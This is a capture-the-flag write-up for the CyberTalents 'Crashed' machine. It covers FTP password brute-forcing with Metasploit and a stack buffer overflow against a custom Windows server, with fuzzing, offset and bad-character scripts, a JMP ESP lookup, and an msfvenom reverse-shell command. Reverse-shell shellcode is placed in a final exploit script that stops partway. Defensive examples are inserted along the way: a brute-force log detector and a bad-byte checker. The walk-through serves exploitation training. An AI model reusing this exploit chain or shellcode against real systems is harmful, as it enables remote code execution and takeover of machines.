Cybertalents Crashed Machine Writeup

Description

Get The highest privilege on the machine and find the flag!

Difficulty: Hard

Target IP: 3.122.178.169

Target IP: 18.193.129.237

Challenge Link: https://cybertalents.com/challenges/machines/crashed

Enumeration

Nmap

root@kali:~/CyberTalents/Crashed# nmap -p21,135,139,445,1887,3389,5357 -A -T4 35.156.101.240
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-12 15:31 BST
Nmap scan report for ec2-35-156-101-240.eu-central-1.compute.amazonaws.com (35.156.101.240)
Host is up (0.014s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2019 Datacenter 17763 microsoft-ds
1887/tcp open  filex-lport
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable

FTP

So we have an FTP server here. I tried to log in with anonymous credentials, but that didn't work. Now the only option left is to brute force the password. We can use the Metasploit module auxiliary/scanner/ftp/ftp_login. It requires a space-separated user/password wordlist, so we take a wordlist from SecLists and edit it to match our needs, replacing each colon (:) with a space.

root@kali:~/CyberTalents/Crashed# cat /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt >> ftp.txt
root@kali:~/CyberTalents/Crashed# cat ftp.txt | sed "s/:/ /g" >> ftp-space-seprated.txt
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > set rhosts 35.156.101.240
rhosts => 35.156.101.240
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE ~/CyberTalents/Crashed/ftp-space-seprated.txt
USERPASS_FILE => ~/CyberTalents/Crashed/ftp-space-seprated.txt
msf6 auxiliary(scanner/ftp/ftp_login) > run

[*] 35.156.101.240:21     - 35.156.101.240:21 - Starting FTP login sweep
[!] 35.156.101.240:21     - No active DB -- Credential data will not be saved!
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: anonymous:anonymous (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: root:rootpasswd (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: root:12hrs37 (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: ftp:b1uRR3 (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: admin:admin (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: localadmin:localadmin (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: admin:1234 (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: apc:apc (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: admin:nas (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: Root:wago (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: Admin:wago (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: User:user (Incorrect: )
[-] 35.156.101.240:21     - 35.156.101.240:21 - LOGIN FAILED: Guest:guest (Incorrect: )
[+] 35.156.101.240:21     - 35.156.101.240:21 - Login Successful: ftp:ftp
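The output above shows the pattern a defender would want to catch on the server side: a burst of failed logins from one source followed by a success. The following is an added example, not part of the original writeup, of a minimal threshold detector for that pattern. It runs over constructed log lines in an assumed, simplified format (not FileZilla Server's real log format), and the IPs, users and timestamps in it are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines in an assumed, simplified format (NOT FileZilla's
# real log format): "<timestamp> <client-ip> LOGIN <OK|FAILED> user=<name>".
SAMPLE_LOG = """\
2021-06-12 15:40:01 203.0.113.5 LOGIN FAILED user=anonymous
2021-06-12 15:40:01 203.0.113.5 LOGIN FAILED user=root
2021-06-12 15:40:02 203.0.113.5 LOGIN FAILED user=ftp
2021-06-12 15:40:02 198.51.100.7 LOGIN OK user=backup
2021-06-12 15:40:02 203.0.113.5 LOGIN FAILED user=admin
2021-06-12 15:40:03 203.0.113.5 LOGIN FAILED user=localadmin
2021-06-12 15:40:03 203.0.113.5 LOGIN FAILED user=apc
2021-06-12 15:40:04 203.0.113.5 LOGIN OK user=ftp
2021-06-12 15:45:00 198.51.100.7 LOGIN FAILED user=backup
2021-06-12 15:45:30 198.51.100.7 LOGIN OK user=backup
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<ip>\S+) "
    r"LOGIN (?P<result>OK|FAILED) user=(?P<user>\S+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
        "ip": m["ip"],
        "ok": m["result"] == "OK",
        "user": m["user"],
    }


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return alerts for sources that reach `threshold` failed logins inside `window`.

    A second, higher-severity alert is raised when the same source then logs in
    successfully while the failure burst is still inside the window, which is the
    signature of a guessed password (as in the ftp:ftp hit above)."""
    failures = defaultdict(deque)  # ip -> timestamps of recent failures
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        q = failures[ev["ip"]]
        # forget failures that have aged out of the window
        while q and ev["ts"] - q[0] > window:
            q.popleft()
        if not ev["ok"]:
            q.append(ev["ts"])
            if len(q) == threshold:  # alert once, when the threshold is crossed
                alerts.append({"ip": ev["ip"], "kind": "bruteforce", "user": None})
        elif len(q) >= threshold:
            alerts.append({"ip": ev["ip"], "kind": "success_after_bruteforce",
                           "user": ev["user"]})
            q.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

With the default threshold of five failures per minute, the sample produces two alerts for 203.0.113.5 (the burst, then the success as user ftp) and none for 198.51.100.7, whose single failure followed by a success is normal user behaviour. Raising the threshold to 7 suppresses both alerts, which is the knob to tune against the false-positive rate of a given server.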

Now that we have working credentials, let's use them and see what is inside the FTP server.

root@kali:~/CyberTalents/Crashed# ftp 3.122.178.169
Connected to 3.122.178.169.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (3.122.178.169:root): ftp
331 Password required for ftp
Password:
230 Logged on
Remote system type is UNIX.
ftp> ls
200 Port command successful
150 Opening data channel for directory listing of "/"
-r--r--r-- 1 ftp ftp          30036 Sep 08  2020 essfunc.dll
-r-xr-xr-x 1 ftp ftp          51635 Sep 10  2020 super_secure_server.exe

Hmm, this looks like a buffer overflow (BOF) machine, so let's download these two files first. I copied them to a Windows 7 machine to work on them locally first.

Buffer Overflow

Enumeration

I ran the super secure server on my local machine, and it looks like the following:

It listens for a connection, so we need to know which port it is running on. We can simply open CMD and type netstat -ab.

It listens on port 13337. Let's connect to it from our Kali machine.

Hmm, we need to find another command to learn more about the application. A simple way is to run the strings command on the executable to reveal its hidden commands.

root@kali:~/CyberTalents/Crashed# strings super_secure_server.exe 
!This program cannot be run in DOS mode.
.text
P`.data
.rdata
0@/4
0@.bs
Starting the super secure server version %s
WSAStartup failed with error: %d
Getaddrinfo failed with error: %d
Socket failed with error: %ld
Bind failed with error: %d
Listen failed with error: %d
Waiting for client connections...
Accept failed with error: %d
Received a client connection from %s:%u
Usage: %s [port_number]
If no port number is provided, the default port of %s will be used.
Welcome to the super secure server! Enter HELP for help
Send failed with error: %d
HELP 
HELP
SECRET
Mission Completed

Now, as you can see, the hidden command is SECRET; that is the one we need to exploit the buffer overflow vulnerability.

Fuzzing

The first phase of exploiting any buffer overflow vulnerability is to find the vulnerable command and then to determine how many characters are needed to overflow the buffer and crash the application.

We will create a simple Python script for this job:

#!/usr/bin/python3
import sys
from time import sleep
import socket

# Start with 100 bytes and add 100 more on every round until the server stops answering.
buffer = b"A" * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)  # do not hang forever once the server has crashed
        s.connect(("192.168.1.6", 13337))
        s.recv(1024)
        s.send(b"SECRET" + buffer)  # sockets take bytes in Python 3, not str
        s.recv(1024)
        s.close()
        sleep(1)
        buffer = buffer + b"A" * 100
    except Exception:
        print("Fuzzing Crashed at {} bytes".format(len(buffer)))
        sys.exit()

This script sends a string of A's that grows by 100 bytes on every connection until the application crashes.

Let's attach the program to Immunity Debugger, then run our script.

The application needs 1000 bytes to crash.

Overwrite EIP

EIP is the instruction pointer: it holds the address of the next instruction to be executed. So we need to control the next instruction that will be executed and point it at our reverse shell to pwn the machine. To do that, we first need to create a unique, non-repeating string using Metasploit.

root@kali:~/CyberTalents/Crashed# msf-pattern_create -l 1500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9

Then we need to edit our script to send this unique string.

#!/usr/bin/python3
import sys
from time import sleep
import socket

buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.6", 13337))
s.recv(1024)
s.send(("SECRET" + buffer).encode())  # encode: sockets take bytes in Python 3
s.close()

By running this script we will see in the debugger which part of the string has overwritten EIP.

EIP now holds 33684232, so we need to find where these bytes fall within our unique string. Metasploit also provides a tool for this.

root@kali:~/CyberTalents/Crashed# msf-pattern_offset -l 1500 -q 33684232
[*] Exact match at offset 998
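Both tools above implement a simple idea, and reimplementing them makes the result of 998 easy to check by hand. The following added example (not from the original writeup or from Metasploit) builds the same cyclic pattern and looks up a register value in it. It accounts for x86 being little-endian, which is why 33684232 must be searched for as the text 2Bh3, and it returns -1 when the value is not in the pattern at all, which means EIP was not overwritten by our data.

```python
import string
import struct
from itertools import product

# Triplets of upper letter, lower letter, digit give 26*26*10 unique triplets,
# so the pattern stays unique up to 20280 characters.
MAX_PATTERN = 26 * 26 * 10 * 3


def pattern_create(length):
    """Build the Metasploit-style cyclic pattern (Aa0Aa1Aa2...).

    Every triplet is unique and every 4-byte window straddles at most two
    triplets, so any 4 bytes read from a register identify their position."""
    if length > MAX_PATTERN:
        raise ValueError("pattern longer than %d needs a wider alphabet" % MAX_PATTERN)
    parts = []
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase, string.digits):
        parts.append(upper + lower + digit)
        if len(parts) * 3 >= length:
            break
    return "".join(parts)[:length]


def pattern_offset(value, length=1500):
    """Locate a 32-bit register value read from the debugger inside the pattern.

    x86 is little-endian, so 0x33684232 is stored in memory as the bytes
    32 42 68 33, i.e. the text '2Bh3'; pack it that way before searching.
    A plain string such as '2Bh3' is searched for as-is.
    Returns -1 if the value does not occur in the pattern (EIP was then not
    overwritten by our data at all)."""
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("ascii", errors="replace")
    else:
        needle = value
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(1500)[:30], "...")
    print("offset of 0x33684232:", pattern_offset(0x33684232))
```

pattern_offset(0x33684232) returns 998, matching msf-pattern_offset above, and the 1500-byte pattern begins with Aa0Aa1 and ends with Bx9 exactly as msf-pattern_create printed it. A value such as 0x42424242 is not in the pattern, so the function returns -1; seeing that in practice means the register was filled by something other than the sent buffer.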

Now let's edit our script to confirm that EIP is overwritten at that offset.

#!/usr/bin/python3
import socket

# 998 bytes of padding, 4 bytes that should land in EIP, then filler after it.
buffer = b"A" * 998 + b"B" * 4 + b"C" * 498

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect(("192.168.1.6", 13337))
s.recv(1024)
s.send(b"SECRET" + buffer + b"\r\n")
s.close()

When we run this script, Immunity Debugger shows that EIP has been overwritten with BBBB (0x42424242).

JMP ESP

As I said, we need to overwrite EIP to control the next instruction. We want that instruction to jump to ESP, which we also control, so we need to find the opcode bytes of a JMP ESP instruction somewhere in the process. We can use Mona to do the job.

https://github.com/corelan/mona

Then, we enter these commands in the immunity debugger:

!mona modules
!mona find -s '\xff\xe4'  -m essfunc.dll

We can choose any of these pointers, as long as all memory protections are disabled for that module.

Check Bad-Chars

Now, before we write our exploit, we need to find the bad characters that would prevent it from running. We can use this script to check for them.

#!/usr/bin/python3
import socket

# Every byte value from 0x01 to 0xff; 0x00 is left out because it terminates C strings.
badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
b"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
b"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
b"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
b"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
b"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
b"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

# Padding, the JMP ESP address found with Mona (little-endian), then the test bytes.
buffer = b"A" * 998 + b"\xA0\x12\x50\x62" + badchars

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect(("192.168.1.6", 13337))
s.recv(1024)
s.send(b"SECRET" + buffer + b"\r\n")
s.close()

After running the script we will see the following:

By comparing the bytes in memory against the ones we sent by eye, we can see that there are no bad chars except "\x00".
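Checking 255 bytes by eye is error-prone, so here is an added example (not part of the original writeup) of the comparison that Mona automates: it diffs the bytes that were sent against a dump of what landed in memory and distinguishes a byte that is altered from one that truncates the copy, which hides everything after it. The three dumps are constructed for illustration, not taken from the real server.

```python
# The byte sequence the bad-char script above sends after the return address:
# 0x01..0xff (0x00 is left out up front, since it terminates C strings).
BADCHAR_TEST = bytes(range(1, 256))


def find_bad_chars(sent, observed):
    """Compare the bytes we sent with the bytes found at ESP in the debugger.

    Returns (altered, truncated_at):
      altered      - sent bytes that arrived in memory with a different value
      truncated_at - the sent byte at which the copy stopped short, or None
    A byte that truncates the copy hides everything after it, so the later
    bytes are unknown rather than bad: remove it and run the test again."""
    altered = []
    for i, b in enumerate(sent):
        if i >= len(observed):
            return altered, b
        if observed[i] != b:
            altered.append(b)
    return altered, None


def without(sent, bad_bytes):
    """Build the next test string with the identified bad bytes removed."""
    drop = set(bad_bytes)
    return bytes(b for b in sent if b not in drop)


# Constructed debugger dumps (not taken from the real server):
# 1. every byte arrived unchanged: the case this writeup found (only 0x00 is bad)
CLEAN_DUMP = BADCHAR_TEST
# 2. a hypothetical server that treats 0x0a as end of input: the copy stops there
TRUNCATED_DUMP = BADCHAR_TEST[:BADCHAR_TEST.index(0x0a)]
# 3. a hypothetical server that rewrites 0x0d to 0x20 before storing the input
ALTERED_DUMP = BADCHAR_TEST.replace(b"\x0d", b"\x20")

if __name__ == "__main__":
    for name, dump in [("clean", CLEAN_DUMP), ("truncated", TRUNCATED_DUMP),
                       ("altered", ALTERED_DUMP)]:
        altered, cut = find_bad_chars(BADCHAR_TEST, dump)
        print(name, "altered:", [hex(b) for b in altered],
              "truncated at:", None if cut is None else hex(cut))
```

The clean dump yields no findings, which is the result this writeup reached. The truncated dump reports 0x0a as the byte where the copy stopped; the correct next step is without(BADCHAR_TEST, [0x0a]) and another run, not marking every later byte as bad. The altered dump reports 0x0d alone, since every other byte matched.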

Generate Payload

The last step before writing our final exploit is to generate the shellcode with msfvenom; it gives us a reverse shell, and with it control of the machine.

root@kali:~/CyberTalents/Crashed# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.4 LPORT=4444 EXITFUNC=thread -f py -a x86 –platform windows -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf =  b""
buf += b"\xda\xc6\xd9\x74\x24\xf4\x5e\x29\xc9\xbf\x48\x33\x25"
buf += b"\x1b\xb1\x52\x31\x7e\x17\x03\x7e\x17\x83\xa6\xcf\xc7"
buf += b"\xee\xca\xd8\x8a\x11\x32\x19\xeb\x98\xd7\x28\x2b\xfe"
buf += b"\x9c\x1b\x9b\x74\xf0\x97\x50\xd8\xe0\x2c\x14\xf5\x07"
buf += b"\x84\x93\x23\x26\x15\x8f\x10\x29\x95\xd2\x44\x89\xa4"
buf += b"\x1c\x99\xc8\xe1\x41\x50\x98\xba\x0e\xc7\x0c\xce\x5b"
buf += b"\xd4\xa7\x9c\x4a\x5c\x54\x54\x6c\x4d\xcb\xee\x37\x4d"
buf += b"\xea\x23\x4c\xc4\xf4\x20\x69\x9e\x8f\x93\x05\x21\x59"
buf += b"\xea\xe6\x8e\xa4\xc2\x14\xce\xe1\xe5\xc6\xa5\x1b\x16"
buf += b"\x7a\xbe\xd8\x64\xa0\x4b\xfa\xcf\x23\xeb\x26\xf1\xe0"
buf += b"\x6a\xad\xfd\x4d\xf8\xe9\xe1\x50\x2d\x82\x1e\xd8\xd0"
buf += b"\x44\x97\x9a\xf6\x40\xf3\x79\x96\xd1\x59\x2f\xa7\x01"
buf += b"\x02\x90\x0d\x4a\xaf\xc5\x3f\x11\xb8\x2a\x72\xa9\x38"
buf += b"\x25\x05\xda\x0a\xea\xbd\x74\x27\x63\x18\x83\x48\x5e"
buf += b"\xdc\x1b\xb7\x61\x1d\x32\x7c\x35\x4d\x2c\x55\x36\x06"
buf += b"\xac\x5a\xe3\x89\xfc\xf4\x5c\x6a\xac\xb4\x0c\x02\xa6"
buf += b"\x3a\x72\x32\xc9\x90\x1b\xd9\x30\x73\xe4\xb6\x3b\x87"
buf += b"\x8c\xc4\x3b\x96\x10\x40\xdd\xf2\xb8\x04\x76\x6b\x20"
buf += b"\x0d\x0c\x0a\xad\x9b\x69\x0c\x25\x28\x8e\xc3\xce\x45"
buf += b"\x9c\xb4\x3e\x10\xfe\x13\x40\x8e\x96\xf8\xd3\x55\x66"
buf += b"\x76\xc8\xc1\x31\xdf\x3e\x18\xd7\xcd\x19\xb2\xc5\x0f"
buf += b"\xff\xfd\x4d\xd4\x3c\x03\x4c\x99\x79\x27\x5e\x67\x81"
buf += b"\x63\x0a\x37\xd4\x3d\xe4\xf1\x8e\x8f\x5e\xa8\x7d\x46"
buf += b"\x36\x2d\x4e\x59\x40\x32\x9b\x2f\xac\x83\x72\x76\xd3"
buf += b"\x2c\x13\x7e\xac\x50\x83\x81\x67\xd1\xa3\x63\xad\x2c"
buf += b"\x4c\x3a\x24\x8d\x11\xbd\x93\xd2\x2f\x3e\x11\xab\xcb"
buf += b"\x5e\x50\xae\x90\xd8\x89\xc2\x89\x8c\xad\x71\xa9\x84"

Now, let’s add our shell code to our final exploit.

#!/usr/bin/python3
import socket

buf =  b""
buf += b"\xb8\xa9\x88\x23\xc6\xdb\xd5\xd9\x74\x24\xf4\x5b\x29"
buf += b"\xc9\xb1\x52\x83\xc3\x04\x31\x43\x0e\x03\xea\x86\xc1"
buf += b"\x33\x10\x7e\x87\xbc\xe8\x7f\xe8\x35\x0d\x4e\x28\x21"
buf += b"\x46\xe1\x98\x21\x0a\x0e\x52\x67\xbe\x85\x16\xa0\xb1"
buf += b"\x2e\x9c\x96\xfc\xaf\x8d\xeb\x9f\x33\xcc\x3f\x7f\x0d"
buf += b"\x1f\x32\x7e\x4a\x42\xbf\xd2\x03\x08\x12\xc2\x20\x44"
buf += b"\xaf\x69\x7a\x48\xb7\x8e\xcb\x6b\x96\x01\x47\x32\x38"
buf += b"\xa0\x84\x4e\x71\xba\xc9\x6b\xcb\x31\x39\x07\xca\x93"
buf += b"\x73\xe8\x61\xda\xbb\x1b\x7b\x1b\x7b\xc4\x0e\x55\x7f"
buf += b"\x79\x09\xa2\xfd\xa5\x9c\x30\xa5\x2e\x06\x9c\x57\xe2"
buf += b"\xd1\x57\x5b\x4f\x95\x3f\x78\x4e\x7a\x34\x84\xdb\x7d"
buf += b"\x9a\x0c\x9f\x59\x3e\x54\x7b\xc3\x67\x30\x2a\xfc\x77"
buf += b"\x9b\x93\x58\xfc\x36\xc7\xd0\x5f\x5f\x24\xd9\x5f\x9f"
buf += b"\x22\x6a\x2c\xad\xed\xc0\xba\x9d\x66\xcf\x3d\xe1\x5c"
buf += b"\xb7\xd1\x1c\x5f\xc8\xf8\xda\x0b\x98\x92\xcb\x33\x73"
buf += b"\x62\xf3\xe1\xd4\x32\x5b\x5a\x95\xe2\x1b\x0a\x7d\xe8"
buf += b"\x93\x75\x9d\x13\x7e\x1e\x34\xee\xe9\xe1\x61\xf1\xed"
buf += b"\x89\x73\xf1\xfc\x15\xfd\x17\x94\xb5\xab\x80\x01\x2f"
